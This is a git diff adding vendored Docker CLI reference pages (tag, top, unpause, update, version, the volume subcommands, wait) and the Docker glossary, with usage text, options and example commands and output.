+followed by a port number in the format `:8080`. If not present, the command
+uses Docker's public registry located at `registry-1.docker.io` by default. Name
+components may contain lowercase characters, digits and separators. A separator
+is defined as a period, one or two underscores, or one or more dashes. A name
+component may not start or end with a separator.
+
+A tag name may contain lowercase and uppercase characters, digits, underscores,
+periods and dashes. A tag name may not start with a period or a dash and may
+contain a maximum of 128 characters.
+
+You can group your images together using names and tags, and then upload them
+to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub).
+
+# Examples
+
+## Tagging an image referenced by ID
+
+To tag a local image with ID "0e5574283393" into the "fedora" repository with
+"version1.0":
+
+    docker tag 0e5574283393 fedora/httpd:version1.0
+
+## Tagging an image referenced by Name
+
+To tag a local image with name "httpd" into the "fedora" repository with
+"version1.0":
+
+    docker tag httpd fedora/httpd:version1.0
+
+Note that since the tag name is not specified, the alias is created for an
+existing local version `httpd:latest`.
+
+## Tagging an image referenced by Name and Tag
+
+To tag a local image with name "httpd" and tag "test" into the "fedora"
+repository with "version1.0.test":
+
+    docker tag httpd:test fedora/httpd:version1.0.test
+
+## Tagging an image for a private repository
+
+To push an image to a private registry and not the central Docker
+registry you must tag it with the registry hostname and port (if needed).
+
+    docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md
new file mode 100644
index 0000000000..0a04828775
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/top.md
@@ -0,0 +1,25 @@
+---
+title: "top"
+description: "The top command description and usage"
+keywords: "container, running, processes"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# top
+
+```markdown
+Usage:  docker top CONTAINER [ps OPTIONS]
+
+Display the running processes of a container
+
+Options:
+      --help   Print usage
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
new file mode 100644
index 0000000000..aa2326fefc
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
@@ -0,0 +1,36 @@
+---
+title: "unpause"
+description: "The unpause command description and usage"
+keywords: "cgroups, suspend, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# unpause
+
+```markdown
+Usage:  docker unpause CONTAINER [CONTAINER...]
+
+Unpause all processes within one or more containers
+
+Options:
+      --help   Print usage
+```
+
+The `docker unpause` command un-suspends all processes in the specified containers.
+On Linux, it does this using the cgroups freezer.
+
+See the
+[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt)
+for further details.
+
+## Related information
+
+* [pause](pause.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md
new file mode 100644
index 0000000000..a13900440f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/update.md
@@ -0,0 +1,120 @@
+---
+title: "update"
+description: "The update command description and usage"
+keywords: "resources, update, dynamically"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## update
+
+```markdown
+Usage:  docker update [OPTIONS] CONTAINER [CONTAINER...]
+
+Update configuration of one or more containers
+
+Options:
+      --blkio-weight value          Block IO (relative weight), between 10 and 1000
+      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
+      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
+  -c, --cpu-shares int              CPU shares (relative weight)
+      --cpu-rt-period int           Limit the CPU real-time period in microseconds
+      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
+      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
+      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
+      --help                        Print usage
+      --kernel-memory string        Kernel memory limit
+  -m, --memory string               Memory limit
+      --memory-reservation string   Memory soft limit
+      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
+      --restart string              Restart policy to apply when a container exits
+```
+
+The `docker update` command dynamically updates container configuration.
+You can use this command to prevent containers from consuming too many
+resources from their Docker host.  With a single command, you can place
+limits on a single container or on many. To specify more than one container,
+provide space-separated list of container names or IDs.
+
+With the exception of the `--kernel-memory` option, you can specify these
+options on a running or a stopped container. On kernel version older than
+4.6, you can only update `--kernel-memory` on a stopped container or on
+a running container with kernel memory initialized.
+
+## Examples
+
+The following sections illustrate ways to use this command.
+
+### Update a container's cpu-shares
+
+To limit a container's cpu-shares to 512, first identify the container
+name or ID. You can use `docker ps` to find these values. You can also
+use the ID returned from the `docker run` command.  Then, do the following:
+
+```bash
+$ docker update --cpu-shares 512 abebf7571666
+```
+
+### Update a container with cpu-shares and memory
+
+To update multiple resource configurations for multiple containers:
+
+```bash
+$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse
+```
+
+### Update a container's kernel memory constraints
+
+You can update a container's kernel memory limit using the `--kernel-memory`
+option. On kernel version older than 4.6, this option can be updated on a
+running container only if the container was started with `--kernel-memory`.
+If the container was started *without* `--kernel-memory` you need to stop
+the container before updating kernel memory.
+
+For example, if you started a container with this command:
+
+```bash
+$ docker run -dit --name test --kernel-memory 50M ubuntu bash
+```
+
+You can update kernel memory while the container is running:
+
+```bash
+$ docker update --kernel-memory 80M test
+```
+
+If you started a container *without* kernel memory initialized:
+
+```bash
+$ docker run -dit --name test2 --memory 300M ubuntu bash
+```
+
+Update kernel memory of running container `test2` will fail. You need to stop
+the container before updating the `--kernel-memory` setting. The next time you
+start it, the container uses the new value.
+
+Kernel version newer than (include) 4.6 does not have this limitation, you
+can use `--kernel-memory` the same way as other options.
+
+### Update a container's restart policy
+
+You can change a container's restart policy on a running container. The new
+restart policy takes effect instantly after you run `docker update` on a
+container.
+
+To update restart policy for one or more containers:
+
+```bash
+$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse
+```
+
+Note that if the container is started with "--rm" flag, you cannot update the restart
+policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the
+container.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md
new file mode 100644
index 0000000000..cb1bcee5b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/version.md
@@ -0,0 +1,67 @@
+---
+title: "version"
+description: "The version command description and usage"
+keywords: "version, architecture, api"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# version
+
+```markdown
+Usage:  docker version [OPTIONS]
+
+Show the Docker version information
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+By default, this will render all version information in an easy to read
+layout. If a format is specified, the given template will be executed instead.
+
+Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+## Examples
+
+**Default output:**
+
+    $ docker version
+	Client:
+	 Version:      1.8.0
+	 API version:  1.20
+	 Go version:   go1.4.2
+	 Git commit:   f5bae0a
+	 Built:        Tue Jun 23 17:56:00 UTC 2015
+	 OS/Arch:      linux/amd64
+
+	Server:
+	 Version:      1.8.0
+	 API version:  1.20
+	 Go version:   go1.4.2
+	 Git commit:   f5bae0a
+	 Built:        Tue Jun 23 17:56:00 UTC 2015
+	 OS/Arch:      linux/amd64
+
+**Get server version:**
+
+    {% raw %}
+    $ docker version --format '{{.Server.Version}}'
+	1.8.0
+    {% endraw %}
+
+**Dump raw data:**
+
+    {% raw %}
+    $ docker version --format '{{json .}}'
+    {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}}
+    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
new file mode 100644
index 0000000000..9b188a9500
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
@@ -0,0 +1,91 @@
+---
+title: "volume create"
+description: "The volume create command description and usage"
+keywords: "volume, create"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# volume create
+
+```markdown
+Usage:  docker volume create [OPTIONS] [VOLUME]
+
+Create a volume
+
+Options:
+  -d, --driver string   Specify volume driver name (default "local")
+      --help            Print usage
+      --label value     Set metadata for a volume (default [])
+  -o, --opt value       Set driver specific options (default map[])
+```
+
+Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. You create a volume and then configure the container to use it, for example:
+
+```bash
+$ docker volume create hello
+hello
+
+$ docker run -d -v hello:/world busybox ls /world
+```
+
+The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container.
+
+Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data.
+
+Volume names must be unique among drivers.  This means you cannot use the same volume name with two different drivers.  If you attempt this `docker` returns an error:
+
+```
+A volume named  "hello"  already exists with the "some-other" driver. Choose a different volume name.
+```
+
+If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error.   
+
+## Driver specific options
+
+Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options:
+
+```bash
+$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey
+```
+
+These options are passed directly to the volume driver. Options for
+different volume drivers may do different things (or nothing at all).
+
+The built-in `local` driver on Windows does not support any options.
+
+The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html).
+
+For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000.
+
+```bash
+$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo
+```
+
+Another example that uses `btrfs`:
+
+```bash
+$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo
+```
+
+Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`:
+
+```bash
+$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo
+```
+
+
+## Related information
+
+* [volume inspect](volume_inspect.md)
+* [volume ls](volume_ls.md)
+* [volume rm](volume_rm.md)
+* [volume prune](volume_prune.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
new file mode 100644
index 0000000000..98e0ee5abf
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
@@ -0,0 +1,59 @@
+---
+title: "volume inspect"
+description: "The volume inspect command description and usage"
+keywords: "volume, inspect"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# volume inspect
+
+```markdown
+Usage:  docker volume inspect [OPTIONS] VOLUME [VOLUME...]
+
+Display detailed information on one or more volumes
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+Returns information about a volume. By default, this command renders all results
+in a JSON array. You can specify an alternate format to execute a
+given template for each result. Go's
+[text/template](http://golang.org/pkg/text/template/) package describes all the
+details of the format.
+
+Example output:
+
+    $ docker volume create
+    85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
+    $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
+    [
+      {
+          "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d",
+          "Driver": "local",
+          "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data",
+          "Status": null
+      }
+    ]
+
+    {% raw %}
+    $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
+    /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data
+    {% endraw %}
+
+## Related information
+
+* [volume create](volume_create.md)
+* [volume ls](volume_ls.md)
+* [volume rm](volume_rm.md)
+* [volume prune](volume_prune.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
new file mode 100644
index 0000000000..90ecef2abe
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
@@ -0,0 +1,183 @@
+---
+title: "volume ls"
+description: "The volume ls command description and usage"
+keywords: "volume, list"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# volume ls
+
+```markdown
+Usage:  docker volume ls [OPTIONS]
+
+List volumes
+
+Aliases:
+  ls, list
+
+Options:
+  -f, --filter value   Provide filter values (e.g. 'dangling=true') (default [])
+                       - dangling=<boolean> a volume if referenced or not
+                       - driver=<string> a volume's driver name
+                       - label=<key> or label=<key>=<value>
+                       - name=<string> a volume's name
+      --format string  Pretty-print volumes using a Go template
+      --help           Print usage
+  -q, --quiet          Only display volume names
+```
+
+List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
+
+Example output:
+
+```bash
+$ docker volume create rosemary
+rosemary
+$docker volume create tyler
+tyler
+$ docker volume ls
+DRIVER              VOLUME NAME
+local               rosemary
+local               tyler
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
+than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* dangling (boolean - true or false, 0 or 1)
+* driver (a volume driver's name)
+* label (`label=<key>` or `label=<key>=<value>`)
+* name (a volume's name)
+
+### dangling
+
+The `dangling` filter matches on all volumes not referenced by any containers
+
+```bash
+$ docker run -d  -v tyler:/tmpwork  busybox
+
+f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18
+$ docker volume ls -f dangling=true
+DRIVER              VOLUME NAME
+local               rosemary
+```
+
+### driver
+
+The `driver` filter matches on all or part of a volume's driver name.
+
+The following filter matches all volumes with a driver name containing the `local` string.
+
+```bash
+$ docker volume ls -f driver=local
+
+DRIVER              VOLUME NAME
+local               rosemary
+local               tyler
+```
+
+#### Label
+
+The `label` filter matches volumes based on the presence of a `label` alone or
+a `label` and a value.
+
+First, let's create some volumes to illustrate this;
+
+```bash
+$ docker volume create the-doctor --label is-timelord=yes
+the-doctor
+$ docker volume create daleks --label is-timelord=no
+daleks
+```
+
+The following example filter matches volumes with the `is-timelord` label
+regardless of its value.
+
+```bash
+$ docker volume ls --filter label=is-timelord
+
+DRIVER              VOLUME NAME
+local               daleks
+local               the-doctor
+```
+
+As can be seen in the above example, both volumes with `is-timelord=yes`, and
+`is-timelord=no` are returned.
+
+Filtering on both `key` *and* `value` of the label, produces the expected result:
+
+```bash
+$ docker volume ls --filter label=is-timelord=yes
+
+DRIVER              VOLUME NAME
+local               the-doctor
+```
+
+Specifying multiple label filter produces an "and" search; all conditions
+should be met;
+
+```bash
+$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no
+
+DRIVER              VOLUME NAME
+```
+
+### name
+
+The `name` filter matches on all or part of a volume's name.
+
+The following filter matches all volumes with a name containing the `rose` string.
+
+    $ docker volume ls -f name=rose
+    DRIVER              VOLUME NAME
+    local               rosemary
+
+## Formatting
+
+The formatting options (`--format`) pretty-prints volumes output
+using a Go template.
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder   | Description
+--------------|------------------------------------------------------------------------------------------
+`.Name`       | Network name
+`.Driver`     | Network driver
+`.Scope`      | Network scope (local, global)
+`.Mountpoint` | Whether the network is internal or not.
+`.Labels`     | All labels assigned to the volume.
+`.Label`      | Value of a specific label for this volume. For example `{{.Label "project.version"}}`
+
+When using the `--format` option, the `volume ls` command will either
+output the data exactly as the template declares or, when using the
+`table` directive, includes column headers as well.
+
+The following example uses a template without headers and outputs the
+`Name` and `Driver` entries separated by a colon for all volumes:
+
+```bash
+$ docker volume ls --format "{{.Name}}: {{.Driver}}"
+vol1: local
+vol2: local
+vol3: local
+```
+
+## Related information
+
+* [volume create](volume_create.md)
+* [volume inspect](volume_inspect.md)
+* [volume rm](volume_rm.md)
+* [volume prune](volume_prune.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
new file mode 100644
index 0000000000..d910a49cdc
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
@@ -0,0 +1,54 @@
+---
+title: "volume prune"
+description: "Remove unused volumes"
+keywords: "volume, prune, delete"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# volume prune
+
+```markdown
+Usage:	docker volume prune [OPTIONS]
+
+Remove all unused volumes
+
+Options:
+  -f, --force   Do not prompt for confirmation
+      --help    Print usage
+```
+
+Remove all unused volumes. Unused volumes are those which are not referenced by any containers
+
+Example output:
+
+```bash
+$ docker volume prune
+WARNING! This will remove all volumes not used by at least one container.
+Are you sure you want to continue? [y/N] y
+Deleted Volumes:
+07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e
+my-named-vol
+
+Total reclaimed space: 36 B
+```
+
+## Related information
+
+* [volume create](volume_create.md)
+* [volume ls](volume_ls.md)
+* [volume inspect](volume_inspect.md)
+* [volume rm](volume_rm.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
+* [system df](system_df.md)
+* [container prune](container_prune.md)
+* [image prune](image_prune.md)
+* [network prune](network_prune.md)
+* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
new file mode 100644
index 0000000000..1bf9dba220
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
@@ -0,0 +1,42 @@
+---
+title: "volume rm"
+description: "the volume rm command description and usage"
+keywords: "volume, rm"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# volume rm
+
+```markdown
+Usage:  docker volume rm [OPTIONS] VOLUME [VOLUME...]
+
+Remove one or more volumes
+
+Aliases:
+  rm, remove
+
+Options:
+  -f, --force  Force the removal of one or more volumes
+      --help   Print usage
+```
+
+Remove one or more volumes. You cannot remove a volume that is in use by a container.
+
+    $ docker volume rm hello
+    hello
+
+## Related information
+
+* [volume create](volume_create.md)
+* [volume inspect](volume_inspect.md)
+* [volume ls](volume_ls.md)
+* [volume prune](volume_prune.md)
+* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md
new file mode 100644
index 0000000000..a07b82b071
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md
@@ -0,0 +1,25 @@
+---
+title: "wait"
+description: "The wait command description and usage"
+keywords: "container, stop, wait"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# wait
+
+```markdown
+Usage:  docker wait CONTAINER [CONTAINER...]
+
+Block until one or more containers stop, then print their exit codes
+
+Options:
+      --help   Print usage
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md
new file mode 100644
index 0000000000..0bc39a2023
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/glossary.md
@@ -0,0 +1,286 @@
+---
+title: "Docker Glossary"
+description: "Glossary of terms used around Docker"
+keywords: "glossary, docker, terms, definitions"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Glossary
+
+A list of terms used around the Docker project.
+
+## aufs
+
+aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that
+Docker supports as a storage backend. It implements the
+[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems.
+
+## base image
+
+An image that has no parent is a **base image**.
+
+## boot2docker
+
+[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made
+specifically to run Docker containers. The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox.
+
+## btrfs
+
+btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker
+supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write)
+filesystem.
+
+## build
+
+build is the process of building Docker images using a [Dockerfile](#dockerfile).
+The build uses a Dockerfile and a "context". The context is the set of files in the
+directory in which the image is built.
+
+## cgroups
+
+cgroups is a Linux kernel feature that limits, accounts for, and isolates
+the resource usage (CPU, memory, disk I/O, network, etc.) of a collection
+of processes. Docker relies on cgroups to control and isolate resource limits.
+
+*Also known as : control groups*
+
+## Compose
+
+[Compose](https://github.com/docker/compose) is a tool for defining and
+running complex applications with Docker. With compose, you define a
+multi-container application in a single file, then spin your
+application up in a single command which does everything that needs to
+be done to get it running.
+
+*Also known as : docker-compose, fig*
+
+## container
+
+A container is a runtime instance of a [docker image](#image).
+
+A Docker container consists of
+
+- A Docker image
+- Execution environment
+- A standard set of instructions
+
+The concept is borrowed from Shipping Containers, which define a standard to ship
+goods globally. Docker defines a standard to ship software.
+
+## data volume
+
+A data volume is a specially-designated directory within one or more containers
+that bypasses the Union File System. Data volumes are designed to persist data,
+independent of the container's life cycle. Docker therefore never automatically
+delete volumes when you remove a container, nor will it "garbage collect"
+volumes that are no longer referenced by a container.
+
+
+## Docker
+
+The term Docker can refer to
+
+- The Docker project as a whole, which is a platform for developers and sysadmins to
+develop, ship, and run applications
+- The docker daemon process running on the host which manages images and containers
+
+
+## Docker Hub
+
+The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with
+Docker and its components. It provides the following services:
+
+- Docker image hosting
+- User authentication
+- Automated image builds and work-flow tools such as build triggers and web hooks
+- Integration with GitHub and Bitbucket
+
+
+## Dockerfile
+
+A Dockerfile is a text document that contains all the commands you would
+normally execute manually in order to build a Docker image. Docker can
+build images automatically by reading the instructions from a Dockerfile.
+
+## filesystem
+
+A file system is the method an operating system uses to name files
+and assign them locations for efficient storage and retrieval.
+
+Examples :
+
+- Linux : ext4, aufs, btrfs, zfs
+- Windows : NTFS
+- macOS : HFS+
+
+## image
+
+Docker images are the basis of [containers](#container). An Image is an
+ordered collection of root filesystem changes and the corresponding
+execution parameters for use within a container runtime. An image typically
+contains a union of layered filesystems stacked on top of each other. An image
+does not have state and it never changes.
+
+## libcontainer
+
+libcontainer provides a native Go implementation for creating containers with
+namespaces, cgroups, capabilities, and filesystem access controls. It allows
+you to manage the lifecycle of the container performing additional operations
+after the container is created.
+
+## libnetwork
+
+libnetwork provides a native Go implementation for creating and managing container
+network namespaces and other network resources. It manage the networking lifecycle
+of the container performing additional operations after the container is created.
+
+## link
+
+links provide a legacy interface to connect Docker containers running on the
+same host to each other without exposing the hosts' network ports. Use the
+Docker networks feature instead.
+
+## Machine
+
+[Machine](https://github.com/docker/machine) is a Docker tool which
+makes it really easy to create Docker hosts on  your computer, on
+cloud providers and inside your own data center. It creates servers,
+installs Docker on them, then configures the Docker client to talk to them.
+
+*Also known as : docker-machine*
+
+## node
+
+A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual
+machine running an instance of the Docker Engine in swarm mode.
+
+**Manager nodes** perform swarm management and orchestration duties. By default
+manager nodes are also worker nodes.
+
+**Worker nodes** execute tasks.
+
+## overlay network driver
+
+Overlay network driver provides out of the box multi-host network connectivity
+for docker containers in a cluster.
+
+## overlay storage driver
+
+OverlayFS is a [filesystem](#filesystem) service for Linux which implements a
+[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems.
+It is supported by the Docker daemon as a storage driver.
+
+## registry
+
+A Registry is a hosted service containing [repositories](#repository) of [images](#image)
+which responds to the Registry API.
+
+The default registry can be accessed using a browser at [Docker Hub](#docker-hub)
+or using the `docker search` command.
+
+## repository
+
+A repository is a set of Docker images. A repository can be shared by pushing it
+to a [registry](#registry) server. The different images in the repository can be
+labeled using [tags](#tag).
+
+Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/)
+and its [tags](https://hub.docker.com/r/library/nginx/tags/)
+
+
+## service
+
+A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how
+you want to run your application containers in a swarm. At the most basic level
+a service  defines which container image to run in the swarm and which commands
+to run in the container. For orchestration purposes, the service defines the
+"desired state", meaning how many containers to run as tasks and constraints for
+deploying the containers.
+
+Frequently a service is a microservice within the context of some larger
+application. Examples of services might include an HTTP server, a database, or
+any other type of executable program that you wish to run in a distributed
+environment.
+
+## service discovery
+
+Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component
+internal to the swarm that automatically assigns each service on an overlay
+network in the swarm a VIP and DNS entry. Containers on the network share DNS
+mappings for the service via gossip so any container on the network can access
+the service via its service name.
+
+You don’t need to expose service-specific ports to make the service available to
+other services on the same overlay network. The swarm’s internal load balancer
+automatically distributes requests to the service VIP among the active tasks.
+
+## swarm
+
+A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode).
+
+## Docker Swarm
+
+Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine.
+
+Docker Swarm is the name of a standalone native clustering tool for Docker.
+Docker Swarm pools together several Docker hosts and exposes them as a single
+virtual Docker host. It serves the standard Docker API, so any tool that already
+works with Docker can now transparently scale up to multiple hosts.
+
+*Also known as : docker-swarm*
+
+## swarm mode
+
+[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration
+features embedded in Docker Engine. When you initialize a new swarm (cluster) or
+join nodes to a swarm, the Docker Engine runs in swarm mode.
+
+## tag
+
+A tag is a label applied to a Docker image in a [repository](#repository).
+tags are how various images in a repository are distinguished from each other.
+
+*Note : This label is not related to the key=value labels set for docker daemon*
+
+## task
+
+A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the
+atomic unit of scheduling within a swarm. A task carries a Docker container and
+the commands to run inside the container. Manager nodes assign tasks to worker
+nodes according to the number of replicas set in the service scale.
+
+The diagram below illustrates the relationship of services to tasks and
+containers.
+
+![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png)
+
+## Toolbox
+
+Docker Toolbox is the installer for Mac and Windows users.
+
+
+## Union file system
+
+Union file systems, or UnionFS, are file systems that operate by creating layers, making them
+very lightweight and fast. Docker uses union file systems to provide the building
+blocks for containers.
+
+
+## virtual machine
+
+A virtual machine is a program that emulates a complete computer and imitates dedicated hardware.
+It shares physical hardware resources with other users but isolates the operating system. The
+end user has the same experience on a Virtual Machine as they would have on dedicated hardware.
+
